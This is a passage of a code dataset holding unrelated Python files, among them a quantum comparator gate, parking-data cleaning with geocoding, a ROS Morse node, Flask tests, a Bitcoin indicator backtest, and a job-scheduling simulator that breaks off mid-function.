double_controlled_comparator(constant: int, n: int) -> Gate:\n ctrl_qreg = QuantumRegister(2, name='ctrl')\n x_qreg = QuantumRegister(n, name='x')\n g_qreg = QuantumRegister(n - 1 if n >= 2 else 1, name='g')\n c_qreg = QuantumRegister(1, name='c')\n\n circuit = QuantumCircuit(ctrl_qreg,\n x_qreg,\n g_qreg,\n c_qreg,\n name=f'CC-CMP_({constant})')\n\n cccx = _triple_controlled_not()\n cccx_qubits = list(chain(ctrl_qreg, x_qreg, c_qreg, g_qreg)) if n == 1 \\\n else list(chain(ctrl_qreg, [g_qreg[n - 2]], c_qreg, [x_qreg[0]]))\n\n circuit.x(x_qreg)\n\n if n == 1:\n if constant == 1:\n circuit.append(cccx, cccx_qubits)\n else:\n body = _carry_body(constant, n, x_qreg, g_qreg)\n body_qubits = list(chain(x_qreg, g_qreg))\n\n circuit.append(cccx, cccx_qubits)\n circuit.append(body, body_qubits)\n circuit.append(cccx, cccx_qubits)\n circuit.append(body.inverse(), body_qubits)\n\n circuit.x(x_qreg)\n\n return circuit.to_gate()\n\n\ndef _carry_body(constant: int, n: int, x_qreg: QuantumRegister, g_qreg: QuantumRegister) -> Gate:\n constant_bits = as_bits_reversed(constant, n)\n circuit = QuantumCircuit(x_qreg, g_qreg)\n\n for i in reversed(range(2, n)):\n if constant_bits[i] == '1':\n circuit.x(x_qreg[i])\n circuit.ccx(g_qreg[i - 2], x_qreg[i], g_qreg[i - 1])\n if constant_bits[i] == '1':\n circuit.x(x_qreg[i])\n\n if constant_bits[1] == '1':\n circuit.cx(x_qreg[1], g_qreg[0])\n circuit.x(x_qreg[1])\n\n if constant_bits[0] == '1':\n circuit.ccx(x_qreg[0], x_qreg[1], g_qreg[0])\n\n for i in range(2, n):\n if constant_bits[i] == '1':\n circuit.cx(x_qreg[i], g_qreg[i - 1])\n circuit.x(x_qreg[i])\n circuit.ccx(g_qreg[i - 2], x_qreg[i], g_qreg[i - 1])\n\n return circuit.to_gate()\n\n\ndef _triple_controlled_not() -> Gate:\n ctrl_qreg = QuantumRegister(3, name='ctrl')\n x_qreg = QuantumRegister(1, name='x')\n g_qreg = QuantumRegister(1, name='g')\n\n circuit = QuantumCircuit(ctrl_qreg,\n x_qreg,\n g_qreg,\n name='CCCX')\n\n for _ in range(2):\n circuit.ccx(ctrl_qreg[2], g_qreg[0], x_qreg[0])\n circuit.ccx(ctrl_qreg[0], ctrl_qreg[1], g_qreg[0])\n\n return circuit.to_gate()\n","sub_path":"gates/takahashi/comparator.py","file_name":"comparator.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"569484379","text":"import math\n\nn = int(input())\ndef gum():\n d = math.sqrt((x2-x1)**2 + (y2-y1)**2)\n \n #원 좌표가 같을 떄 \n if(d==0):\n if(r1==r2):\n print(-1)\n \n if(r1!=r2):\n print(0)\n \n #원 좌표가 다를 떄 \n else:\n if(d == r1+r2 or d == abs(r2-r1)):\n print(1)\n elif(abs(r2-r1) < d < r2+r1):\n print(2)\n else:\n print(0)\n\n\nfor i in range(n):\n x1, y1, r1, x2, y2, r2 = map(int, input().split())\n gum()\n\n\n\n","sub_path":"python_study/Baekjoon/0729_1002.py","file_name":"0729_1002.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462297807","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\ndef BoundaryFilter(Positions, Gridsize, Boundary):\r\n \"\"\" This function returns two lists of x-y particle coordinates for\r\n particles that were more than the Boundary value (in nanometers, Bvalue\r\n defined below converts to Ångstrøm) from the edge of the grid. 
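# A standalone sketch of the two-circle intersection count from the
# gum() routine above, using squared distances so integer inputs avoid
# float sqrt comparisons entirely.
def circle_intersections(x1, y1, r1, x2, y2, r2):
    d2 = (x2 - x1) ** 2 + (y2 - y1) ** 2
    if d2 == 0:
        return -1 if r1 == r2 else 0  # concentric: infinitely many or none
    if d2 == (r1 + r2) ** 2 or d2 == (r1 - r2) ** 2:
        return 1                      # externally or internally tangent
    if (r1 - r2) ** 2 < d2 < (r1 + r2) ** 2:
        return 2
    return 0

assert circle_intersections(0, 0, 1, 2, 0, 1) == 1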
The\r\n \"Positions\" parameter is a 2D array of x-y particle positions and the\r\n gridsize is the sidelength of the simulation grid.\"\"\"\r\n\r\n \"\"\"Creating empty lists for appending later\"\"\"\r\n dim1 =[]\r\n dim2 =[]\r\n \"\"\"Converting the desired boundary value from nanometers to Ångstrøm\"\"\"\r\n Bvalue = Boundary*10\r\n\r\n \"\"\"Loop through each position and determine if it is filtered or not.\"\"\"\r\n for i, a in enumerate(Positions[0]):\r\n if Positions[0][i]>Bvalue and Positions[0][i]Bvalue and Positions[1][i] 00:00\n# ex2) 미개방 -> nan\nfor cols in park.keys():\n if '개방' in cols:\n for i in park.index:\n try:\n len(park[cols][i])\n except:\n 1\n else:\n if len(park[cols][i]) == 4 and ':00' in park[cols][i]:\n park[cols][i] = '0' + park[cols][i]\n elif '24:00' in park[cols][i]:\n park[cols][i] = '24:00'\n print(\"num!\", i)\n\n# 개방시작시간, 개방종료시간 combine\n# 14일 00:00, 24:00 -> 14,00:00~24:00\n# day_flag(개방시작시간) == 0\n# day_flag(개방종료시간) == 1\nday_flag = 0\nfor cols in park.keys():\n # 개방시작시간 읽으면서 종료시간까지 읽고 combine하여 새로운 column 생성\n if '개방' in cols and day_flag == 0:\n day_flag = 1\n days, tmp = cols.split(', ')\n year, month, day_week = days.split('.')\n new_cols = month+'.'+day_week\n day, week = day_week.split('(')\n \n park[new_cols] = day + ',' + park[cols] + '~' + park[days+', 개방종료시간']\n park.rename(columns={cols:days}, inplace=True)\n \n elif day_flag == 1:\n day_flag = 0\n\n# 기존의 날짜 column 삭제\nfor cols in park.keys():\n if \"18\" in cols or 'Unnamed' in cols:\n del park[cols]\n\n# 위도가 비어있는 부분을 찾아 print하여 확인하는 작업\n# print를 이제 dict에서 x, y에 저장해야 하지만 데이터를 못찾는 부분이 존재함\nfor i in park.index:\n try :\n addr_ll = gmaps.geocode(park['주소'][i], language='ko')[0]['geometry']['location']\n addr_x = str(addr_ll['lat'])\n addr_y = str(addr_ll['lng'])\n except :\n 1\n finally:\n print(i, addr_x, addr_y, park.주차장명[i])\n park['위도'][i] = addr_x\n park['경도'][i] = addr_y\n\n\n\n# 자치단체 주차장 현황 data 삽입\nschool = pd.read_csv('./data/2018_parking_school_chu.csv')\n\n# column name을 보기 편하게 변경\nschool.rename(columns={\"주차장유형 (노상/노외/부설)\":\"주차장유형\",\n \"전화번호 (주차장관리자)\":\"전화번호\"}, inplace=True)\n\n\n# 주차장명이 없는 CASE\nrow, col = school.shape\nfor i in range(row):\n # 주차장명이 float(nan) 인 경우 해당 row를 삭제\n if type(school['주차장명'][i]) == float:\n school.drop([i], inplace=True)\n\n \nfor i in school.index:\n # 관리기관의 data가 nan인 경우 어차피 교육청이 관리하므로 교육청을 복사해줌!\n if type(school.loc[i].관리기관) == float:\n school.loc[i].관리기관 = school.loc[i].시도 + '교육청'\n\n\n# 개방시작, 개방종료 시간 양식 통일화\n# ex1) 0:00 -> 00:00\n# ex2) 미개방 -> nan\nfor cols in school.keys():\n if '개방' in cols:\n for i in school.index:\n try:\n len(school[cols][i])\n except:\n 1\n else:\n if len(school[cols][i]) == 4 and ':00' in school[cols][i]:\n school[cols][i] = '0' + school[cols][i]\n elif '24:00' in school[cols][i]:\n school[cols][i] = '24:00'\n print(\"num!\", i)\n\n# 개방시작시간, 개방종료시간 combine\n# 14일 00:00, 24:00 -> 14,00:00~24:00\n# day_flag(개방시작시간) == 0\n# day_flag(개방종료시간) == 1\nday_flag = 0\nfor cols in school.keys():\n # 개방시작시간 읽으면서 종료시간까지 읽고 combine하여 새로운 column 생성\n if '개방' in cols and day_flag == 0:\n day_flag = 1\n days, tmp = cols.split(', ')\n year, month, day_week = days.split('.')\n new_cols = month+'.'+day_week\n day, week = day_week.split('(')\n \n school[new_cols] = day + ',' + school[cols] + '~' + school[days+', 개방종료시간']\n school.rename(columns={cols:days}, inplace=True)\n \n elif day_flag == 1:\n day_flag = 0\n\n# 기존의 날짜 column 삭제\nfor cols in school.keys():\n if \"18\" in cols or 'Unnamed' in cols:\n del school[cols]\n\n# 위도가 비어있는 부분을 찾아 
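# A minimal sketch of the opening-hour normalization applied to the
# parking data above; it mirrors the original, which only zero-pads
# values ending in ':00' and clamps anything containing '24:00'.
def normalize_time(value):
    if not isinstance(value, str):
        return value  # leave NaN / non-strings untouched
    if '24:00' in value:
        return '24:00'
    if len(value) == 4 and value.endswith(':00'):
        return '0' + value
    return value

assert normalize_time('0:00') == '00:00'
assert normalize_time('24:00') == '24:00'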
print하여 확인하는 작업\n# print를 이제 dict에서 x, y에 저장해야 하지만 데이터를 못찾는 부분이 존재함\nfor i in school.index:\n try :\n addr_ll = gmaps.geocode(school['주소'][i], language='ko')[0]['geometry']['location']\n addr_x = str(addr_ll['lat'])\n addr_y = str(addr_ll['lng'])\n except :\n 1\n finally:\n print(i, addr_x, addr_y, school.주차장명[i])\n school['위도'][i] = addr_x\n school['경도'][i] = addr_y\n\n \ncombined = pd.merge(park, school, how='outer')\n\n# index column 삭제\nfor cols in park.keys():\n if 'Unnamed' in cols:\n del combined[cols]\n\n\n# final.csv를 저장\ncombined.to_csv('./data/final_data_chu.csv', encoding='utf-8-sig')\n","sub_path":"Read_data_final.py","file_name":"Read_data_final.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446925621","text":"#!/usr/bin/env python\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2017, Daniel Persson\n#\n# morse_middleman.py\n# Node in between user input node and hardware (LED blink) node. Does translation from text\n# to morse blinks.\n\nimport rospy\nfrom std_msgs.msg import String\nfrom led_blink.srv import Morse\nfrom led_blink.msg import Blink\n\n# Speed: n*0.25 seconds.\nSPEED = 1;\n\n# Helper functions in order to control LED on/off and duration for morse chars.\ndef beep(x):\n return {\n ' ': False,\n '-': True,\n '_': True\n }[x]\ndef length(x):\n return {\n ' ': 1,\n '-': 1,\n '_': 2\n }[x]\n\ndef callback(data):\n pub = rospy.Publisher('userinput', Blink, queue_size=100)\n rospy.loginfo(rospy.get_caller_id() + 'I heard %s', data.data)\n \n # Use the morse_translate service to translate from text to '-_ ':s.\n morse_translate = rospy.ServiceProxy('morse_translate', Morse)\n morse = morse_translate(data.data)\n \n # Go through the translation and send beeps to hardware node.\n for c in morse.morse:\n msg = Blink()\n msg.on = beep(c) # True if the LED should be on.\n msg.timeout = SPEED*length(c) # Duration of blink.\n pub.publish(msg) \n \n # Beeps must have silence in between, which is added here.\n if (msg.on):\n msg = Blink()\n msg.on = False\n msg.timeout = SPEED*2\n pub.publish(msg)\n\ndef listener():\n rospy.init_node('morse_middleman', anonymous=True)\n rospy.Subscriber('userinput_morse', String, callback)\n \n rospy.spin()\n\nif __name__ == '__main__':\n listener()","sub_path":"src/led_blink/scripts/morse_middleman.py","file_name":"morse_middleman.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"563019097","text":"N, M = map(int, input().split())\nS = input()\n\np = N\nprev = N\nflag = True\nans = []\nfor i in range(N, -1, -1):\n if (prev - i) > M:\n ans.append(prev - p)\n prev = p\n if (prev - i) > M:\n flag = False\n break\n if S[i] == \"0\":\n p = i\nans.append(prev)\nif flag:\n print(\" \".join(map(str, ans[::-1])))\nelse:\n print(-1)\n","sub_path":"Python_codes/p02852/s049319162.py","file_name":"s049319162.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"152716166","text":"'''\nCreated on Dec 3, 2013\n\n@author: lasitha\n'''\n\n\nclass BiGramSearcher:\n \n \n def getCount(self,sentense):\n thefile = open('NgramCorpuses/w2_.txt','r')\n frequency =0\n for line in thefile:\n temp = ' '.join(line.split()) \n \n if sentense in temp:\n \n frequency = line.split()[0]\n return frequency\n thefile.close()\n \n return 
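# A sketch of the bigram lookup above using a context manager: the
# thefile.close() above sits after a return inside the loop, so the
# handle never closes on a hit. Frequencies stay strings, as above.
def get_count(path, phrase):
    with open(path) as handle:
        for line in handle:
            normalized = ' '.join(line.split())
            if phrase in normalized:
                return normalized.split()[0]  # frequency column
    return 0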
frequency","sub_path":"Twitter/src/BiGramSearcher.py","file_name":"BiGramSearcher.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112298593","text":"import sys\nimport os.path\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, 'app')))\nimport unittest\nfrom main import app\nfrom app.models import *\nfrom sample_db import example_data\nfrom connect import connect_to_db\nfrom flask_login import login_user, current_user\nfrom app.routes import login, logout, register, home\nfrom app.login import post_resistration\nfrom app.forms import RegistrationForm\nimport datetime\n\n\nclass FlaskTestLogin(unittest.TestCase):\n\n\tdef setUp(self):\n\t\t\"\"\"Do before every test\"\"\"\n\n\t\t# Get the Flask test client\n\t\tself.client = app.test_client()\n\t\tapp.config['TESTING'] = True\n\t\tself._ctx = app.test_request_context()\n\t\tself._ctx.push()\n\n\t\t# Connect to test database\n\t\tconnect_to_db(app, 'sqlite:////tmp/test.db')\n\n\t\t# Create tables and add sample data\n\t\tdb.create_all()\n\t\texample_data()\n\n\tdef tearDown(self):\n\t\t\"\"\"Do at end of every test\"\"\"\n\t\tif self._ctx is not None:\n\t\t\tself._ctx.pop()\n\n\t\tdb.session.close()\n\t\tdb.drop_all()\n\n\t\"\"\"Test login\"\"\"\n\n\tdef test_login(self):\n\t\tresult = login()\n\t\tself.assertIn(\"Log In\", result)\n\n\tdef test_logout(self):\n\t\tlogin_user(User.query.get(1))\n\t\tself.assertEquals(current_user.username, 'karen')\n\t\tself.assertFalse(current_user.is_anonymous)\n\t\tlogout()\n\t\tself.assertTrue(current_user.is_anonymous)\n\n\tdef test_register_page(self):\n\t\tresult = register()\n\t\tself.assertIn(\"Sign Up\", result)\n\n\tdef test_post_resistration(self):\n\t\tuser = User.query.filter_by(username=\"susan\").first()\n\t\tself.assertIsNone(user)\n\t\tform = RegistrationForm(username=\"susan\", email=\"susan@example.com\", password=\"susan\", password_repeat=\"susan\", fname=\"Susan\", lname=\"Smith\", birthday=datetime.date(1993, 7, 3))\n\t\tpost_resistration(form)\n\t\tuser = User.query.filter_by(username=\"susan\").first()\n\t\tself.assertIsNotNone(user)\n\n\n\t\"\"\"Test homepage\"\"\"\n\n\tdef test_home(self):\n\t\tlogin_user(User.query.get(1))\n\t\tresult = home()\n\t\tself.assertIn(\"Discover\", result)\n\t\tself.assertIn(\"
\n        Coming Up\n
        \", result)\n\n\nif __name__ == '__main__':\n\tunittest.main()","sub_path":"tests/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561631587","text":"import numpy as np\r\nfrom random import randint\r\nfrom pprint import pprint\r\n\r\ndef assign_var_len_tslots(row):\r\n duration = randint(2,6)\r\n start = randint(0, 25-duration)\r\n row = row.reshape((1, 26))\r\n row[:, start:start+duration] = 1\r\n return row\r\n\r\ndef assign_fix_len_tslots(row):\r\n row = row.reshape((1, 5))\r\n row[:] = 1\r\n return row\r\n\r\ndef conflicts_within_array(size, apply_func):\r\n class_tslots = np.zeros(size)\r\n np.apply_along_axis(apply_func, 1, class_tslots)\r\n conflicts = np.triu(class_tslots.dot(class_tslots.T), 1)\r\n num_of_conflicts = np.count_nonzero(conflicts)\r\n pprint(conflicts)\r\n return num_of_conflicts\r\n\r\nprint(\"array(15, 56) random lengths 2-5 inclusive conflicts\")\r\nprint(conflicts_within_array((15, 26), assign_var_len_tslots))\r\n\r\nprint(\"\\narray(15, 5) fixed length 5 conflicts\")\r\nprint(\"sanity check should be equal to 15*14/2 == 105\")\r\nprint(conflicts_within_array((15, 5), assign_fix_len_tslots))","sub_path":"numpy_conflicts.py","file_name":"numpy_conflicts.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"345050719","text":"# Code modified and fixed from Stock Technical Analysis with Python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport talib as ta\n\n### DATA\ndf = pd.read_csv(\"./coinbaseBTCUSD_1min_2014-12-01_to_2017-10-20.csv\")\ndf.timestamp = pd.to_datetime(df.timestamp,unit='s') # timestamp is in seconds\ndf.index = df.timestamp\ndel df['timestamp']\ndf = df.loc['2014-12-01T06:00:00':'2017-10-19T23:59:00'] # remove rows that do no lie within the hour window\n\n# resample to hourly data to daily\ndf = df.resample(rule=\"120T\").agg(\n\t\t{'open':'first','high':'max','low':'min','close':'last','volbtc':'sum','volusd':'sum','wtdprice':'last'})\n# 2017- data\ndf = df['1-1-2017':].copy()\n# bollinger bands\ndf['bb_high'],df['bb_mid'],df['bb_low'] = ta.BBANDS(np.asarray(df.close),\n timeperiod=7,nbdevup=1.5,nbdevdn=1.5,matype=0)\n# rsi\ndf['rsi'] = ta.RSI(np.asarray(df.close),timeperiod=7)\n\n### TRADING SIGNAL (buy=1 , sell=-1, hold=0)\n# price cross over BB and RSI cross over threshold\n# backteset BB to avoid back-testing bias\ndf['close_lag1'] = df.close.shift(1)\ndf['bb_low_lag1'] = df.bb_low.shift(1)\ndf['bb_high_lag1'] = df.bb_high.shift(1)\ndf['close_lag2'] = df.close.shift(2)\ndf['bb_low_lag2'] = df.bb_low.shift(2)\ndf['bb_high_lag2'] = df.bb_high.shift(2)\ndf['rsi_lag1'] = df.rsi.shift(1)\ndf['rsi_lag2'] = df.rsi.shift(2)\n\n# generate trading signals\ndf['signal'] = 0 # default to do nothing\n# TODO: refine until the signals look right!!!!\n# if lag2 price is less than lag2 bb lower and the oppostive for lag1 values, then buy signal\ndf.loc[(df.close_lag2df.bb_high_lag2) & (df.close_lag1>df.bb_high_lag1) & (df.rsi_lag1>85),'signal'] = -1\n# first signal will be a buy\ndf.iloc[0,df.columns.get_loc('signal')] = 1\n\nprint(df.signal.value_counts())\n\n### TRADING STRATEGY\n# own asset=1, not own asset=0\ndf['portfolio'] = 1\nportfolio = 0\nfor i,r in enumerate(df.iterrows()):\n\tif r[1]['signal']==1:\n\t\tportfolio = 1\n\telif r[1]['signal']==-1:\n\t\tportfolio = 
0\n\telse:\n\t\tportfolio = df.portfolio[i-1]\n\tdf.iloc[i,df.columns.get_loc('portfolio')] = portfolio\n\n### ANALYSIS\n# Strategies Daily Returns\n# Bands Crossover Strategy Without Trading Commissions\n# TODO: can't i just do df.close.diff()*df.portfolio?\ndf['trade_returns'] = ((df.close/df.close_lag1)-1)*df.portfolio\ndf.iloc[0,df.columns.get_loc('trade_returns')] = 0.0 # no return for the first period\n# Buy and Hold Strategy\ndf['bh_returns'] = (df.close/df.close_lag1)-1\ndf.iloc[0,df.columns.get_loc('bh_returns')] = 0.0 # no return for the first period\n\n# Strategies Cumulative Returns\n# Cumulative Returns Calculation\n# TODO: check calculations\ndf['trade_cum_returns'] = (np.cumprod(df.trade_returns+1)-1)\ndf['bh_cum_returns'] = (np.cumprod(df.bh_returns+1)-1)\n\n# Strategies Performance Metrics\n# Annualized Returns\ntrade_yr_returns = df.trade_cum_returns.tail(1).values[0]\nbh_yr_returns = df.bh_cum_returns.tail(1).values[0]\n# Annualized Standard Deviation\ntrade_std = np.std(df.trade_returns.values)*np.sqrt(365.) # cryptos trade 365\nbh_std = np.std(df.bh_returns.values)*np.sqrt(365.)\n# Annualized Sharpe Ratio\ntrade_sharpe = trade_yr_returns/trade_std\nbh_sharpe = bh_yr_returns/bh_std\n\n# Summary Results Data Table\nprint('\\n')\nsummary_df = pd.DataFrame(\n\t\t{'Summary' :['Return','Std Dev','Sharpe (Rf=0%)'],'Trade':[trade_yr_returns,trade_std,trade_sharpe],\n\t\t 'Buy&Hold':[bh_yr_returns,bh_std,bh_sharpe]})\nsummary_df = summary_df[['Summary','Trade','Buy&Hold']]\nwith pd.option_context('display.precision',2):\n\tprint(summary_df)\n\n# CHARTING\nfig1,ax = plt.subplots(5,sharex=True)\nax[0].plot(df['close'])\nax[0].plot(df['bb_high'],linestyle='--',label='high')\nax[0].plot(df['bb_mid'],linestyle='--',label='middle')\nax[0].plot(df['bb_low'],linestyle='--',label='low')\nax[0].legend(loc='upper left')\nax[1].plot(df['rsi'],color='green',label='rsi')\nax[1].axhline(y=85,linestyle='--',color='orange')\nax[1].axhline(y=35,linestyle='--',color='orange')\nax[1].legend(loc='upper left')\nax[2].plot(df['signal'],marker='o',markersize=5,linestyle='',label='signal',color='red')\nax[2].legend(loc='upper left')\nax[3].plot(df['portfolio'],marker='o',markersize=5,linestyle='',label='portfolio',color='green')\nax[3].legend(loc='upper left')\nax[4].plot(df['trade_cum_returns'],label='trade')\nax[4].plot(df['bh_cum_returns'],label='buy&hold')\nax[4].legend(loc='upper left')\nplt.suptitle('BTC 2hr Close Prices, BB (7, 1.5), & RSI (7)')\nplt.show()\n\n# additional indicators\ndf['cci'] = ta.CCI(np.asarray(df['high']), np.asarray(df['low']), np.asarray(df['close']), timeperiod=7)\ndf['roc'] = ta.ROC(np.asarray(df['close']), timeperiod=21)\ndf['rsi2'] = ta.RSI(np.asarray(df.close),timeperiod=2)\ndf['rsi14'] = ta.RSI(np.asarray(df.close),timeperiod=14)\ndf['cci2'] = ta.CCI(np.asarray(df['high']), np.asarray(df['low']), np.asarray(df['close']), timeperiod=3)\n\n\nfig1,ax = plt.subplots(2,sharex=True)\nax[0].plot(df['close'])\nax[0].legend(loc='upper left')\nax[1].plot(df['cci'],color='green')\nax[1].plot(df['roc'],color='red')\nax[1].legend(loc='upper left')\nplt.suptitle('BTC 2hr Close Prices, CCI(7), ROC(7)')\nplt.show()\n\n\n# persist df\ndf.to_csv(\"./coinbaseBTCUSD-withsignals-2hr.csv\")\n","sub_path":"code/archive/label-bb-rsi-2hr.py","file_name":"label-bb-rsi-2hr.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"161941766","text":"from tkinter import *\r\nimport sys\r\nimport 
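# A loop-free sketch of the position carry-forward above: +1 opens a
# position, -1 closes it, 0 holds the previous state.
import numpy as np
import pandas as pd

signal = pd.Series([1, 0, 0, -1, 0, 1])
position = signal.replace(0, np.nan).ffill().fillna(0).clip(lower=0)
assert position.tolist() == [1.0, 1.0, 1.0, 0.0, 0.0, 1.0]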
os\r\nimport subprocess\r\nfrom sys import platform\r\n\r\nclass Empsal:\r\n\r\n    \r\n    def __init__(self, root):\r\n\r\n        self.main_lbl=Label(root, text='Experience Vs. Salary Linear Regression \\n and Predict Salary Based On Experience', fg='red', font=('Arial', -22, 'bold underline'))\r\n        self.main_lbl.place(x=150, y=200)\r\n        \r\n        self.callPython = \"\"\r\n        if platform == \"linux\" or platform == \"linux2\":\r\n            self.callPython = \"python3\"\r\n        elif platform == \"win32\":\r\n            self.callPython = \"python.exe\"\r\n\r\n        self.menubar=Menu(root)\r\n        root.config(menu=self.menubar) \r\n        self.mysql_menu=Menu(root, tearoff=0)\r\n\r\n        self.menubar.add_cascade(label='Data Conversion', menu=self.mysql_menu)\r\n        self.mysql_menu.add_command(label='Build DF', command=self.create_df)\r\n        self.mysql_menu.add_command(label='Build CSV', command=self.create_csv)\r\n        self.mysql_menu.add_command(label='Convert to Excel', command=self.mysql_to_xls)\r\n        \r\n        \r\n        self.mysql_menu.add_separator()\r\n        self.mysql_menu.add_command(label='Exit', command=root.destroy)\r\n\r\n        self.data_menu=Menu(root, tearoff=0)\r\n        self.menubar.add_cascade(label='Reports', menu=self.data_menu)\r\n        self.data_menu.add_command(label='Rep1', command=self.rep1)\r\n        self.data_menu.add_command(label='Rep2', command=self.rep2)\r\n        self.data_menu.add_command(label='Rep3', command=self.rep3)\r\n        self.data_menu.add_command(label='Plot', command=self.plot)\r\n        \r\n        \r\n        self.predict_menu=Menu(root, tearoff=0)\r\n        self.menubar.add_cascade(label='Prediction', menu=self.predict_menu)\r\n        self.predict_menu.add_command(label='Predict', command=self.predict)\r\n        \r\n\r\n    def create_df(self):\r\n        subprocess.check_call([self.callPython,\"create_df.py\"])\r\n    def create_csv(self):\r\n        subprocess.check_call([self.callPython,\"create_csv.py\"])\r\n    def mysql_to_xls(self):\r\n        subprocess.check_call([self.callPython, \"create_excl.py\"])\r\n    \r\n    def rep1(self):\r\n        subprocess.check_call([self.callPython, \"rep1.py\"])\r\n    def rep2(self): \r\n        subprocess.check_call([self.callPython, \"rep2.py\"])\r\n    def rep3(self):\r\n        subprocess.check_call([self.callPython, \"rep3.py\"]) \r\n    def plot(self):\r\n        subprocess.check_call([self.callPython, \"plot.py\"])\r\n    \r\n    def predict(self):\r\n        subprocess.check_call([self.callPython, \"predict.py\"]) \r\n#=====================================================================================================\r\n    \r\nroot=Tk()\r\nroot.title('Experience vs. 
Salary Linear Regression and predict Salary based on Experience')\r\n\r\nobj=Empsal(root)\r\nroot.geometry('800x600')\r\nroot.mainloop()\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"project/menuprog.py","file_name":"menuprog.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"432304915","text":"import numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\nnp.random.seed(3)\n\nclass SchedulingEnvironment:\n def __init__(self):\n # -------------------------------- VM info -------------------------------------\n self.VMnum = 10\n self.VMtypes = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]\n self.VMcapacity = 1000 # mips\n self.VMEnergypertimeunit = [1.25, 1.5, 1.25, 1.5, 1.25, 1.25, 1.5, 1.25 ,1.5, 1.25]\n \n self.actionNum = self.VMnum\n \n self.s_features = 1 + self.VMnum # consider waitT\n # ----------------------------------- workload -----------------------------------\n self.jobMI = 100 # short job\n self.jobMI_std = 20\n self.lamda_range = [30, 70] # arrival rate range\n\n # generate jobs' arrivalT\n self.totalDuration = 200\n self.timeCycle = 5 # frequency of change lamda\n self.changeTimes = int(self.totalDuration / self.timeCycle)\n self.lamdas = np.zeros(self.changeTimes)\n self.arrival_Times = self.gen_random_jobsTimes(self.lamda_range[0], self.lamda_range[1])\n self.jobNum = len(self.arrival_Times)\n\n # generate jobs' other attrs\n self.jobsMI = np.zeros(self.jobNum)\n self.lengths = np.zeros(self.jobNum)\n self.types = np.zeros(self.jobNum)\n self.ddl = np.ones(self.jobNum) * 0.25 # 250ms = waitT + exeT\n self.gen_random_jobsOthers()\n\n \n # >>>>>>>>>>>>>random policy<<<<<<<<<<<<\n \n self.RAN_events = np.zeros((9, self.jobNum))\n # 1-idle time 2-jobNum on it\n self.RAN_VM_events = np.zeros((2, self.VMnum))\n # >>>>>>>>>>>>>round robin policy<<<<<<<<<<<<\n self.RR_events = np.zeros((9, self.jobNum))\n self.RR_VM_events = np.zeros((2, self.VMnum))\n # >>>>>>>>>>>>>earliest policy<<<<<<<<<<<<\n self.early_events = np.zeros((9, self.jobNum))\n self.early_VM_events = np.zeros((2, self.VMnum))\n # >>>>>>>>>>>>>DQN policy<<<<<<<<<<<<\n self.DQN_events = np.zeros((9, self.jobNum))\n self.DQN_VM_events = np.zeros((2, self.VMnum))\n \n def gen_random_jobsTimes(self, low, high):\n # generate arrival time of jobs (poisson distribution)\n lamdas = np.random.randint(low, high+1, self.changeTimes) # [low, high]\n self.lamdas = lamdas\n \n # (lamda change according to time)\n maxJobNum = self.totalDuration * high\n temp_arrivalT = np.zeros(maxJobNum)\n jobC = 1 # initial jobNum, first job arrivalT = 0\n tempCycle = 0\n for w in range(self.changeTimes):\n while True:\n intervalT = stats.expon.rvs(scale=1 / lamdas[w], size=1)\n tempCycle += intervalT\n if tempCycle >= (w+1) * self.timeCycle:\n break\n temp_arrivalT[jobC] = temp_arrivalT[jobC-1] + intervalT\n jobC += 1\n firstZero = np.argwhere(temp_arrivalT == 0)[1][0] # e.g. 
[[0][5019][5020]...]\n print('maxJobNum:', maxJobNum, ' realJobNum:', firstZero)\n arrivalT = temp_arrivalT[0:firstZero]\n\n last_arrivalT = arrivalT[- 1]\n print('last job arrivalT:', round(last_arrivalT, 3))\n return arrivalT\n\n def gen_random_jobsOthers(self):\n # generate jobs' length\n \n self.jobsMI = np.random.normal(self.jobMI, self.jobMI_std, self.jobNum)\n self.jobsMI = self.jobsMI.astype(int)\n print(\"MI mean: \", round(np.mean(self.jobsMI), 3), ' MI SD:', round(np.std(self.jobsMI, ddof=1), 3))\n self.lengths = self.jobsMI / self.VMcapacity\n print(\"length mean: \", round(np.mean(self.lengths), 3), ' length SD:', round(np.std(self.lengths, ddof=1), 3))\n\n # generate jobs' type\n types = np.zeros(self.jobNum)\n \n # (random probability)\n print('typePro:', end='')\n \n timeC = 1\n typePro = np.random.uniform()\n for i in range(self.jobNum):\n if self.arrival_Times[i] >= 5 * timeC:\n typePro = np.random.uniform()\n print(round(typePro, 3), '', end='')\n timeC += 1\n if np.random.uniform() < typePro:\n types[i] = 0\n else:\n types[i] = 1\n print('')\n self.types = types\n\n def gen_fixed_workload(self, lamda):\n \n all_intervalT = np.zeros(self.jobNum)\n change_jobs = int(self.jobNum / len(lamda))\n for w in range(len(lamda)):\n intervalT = 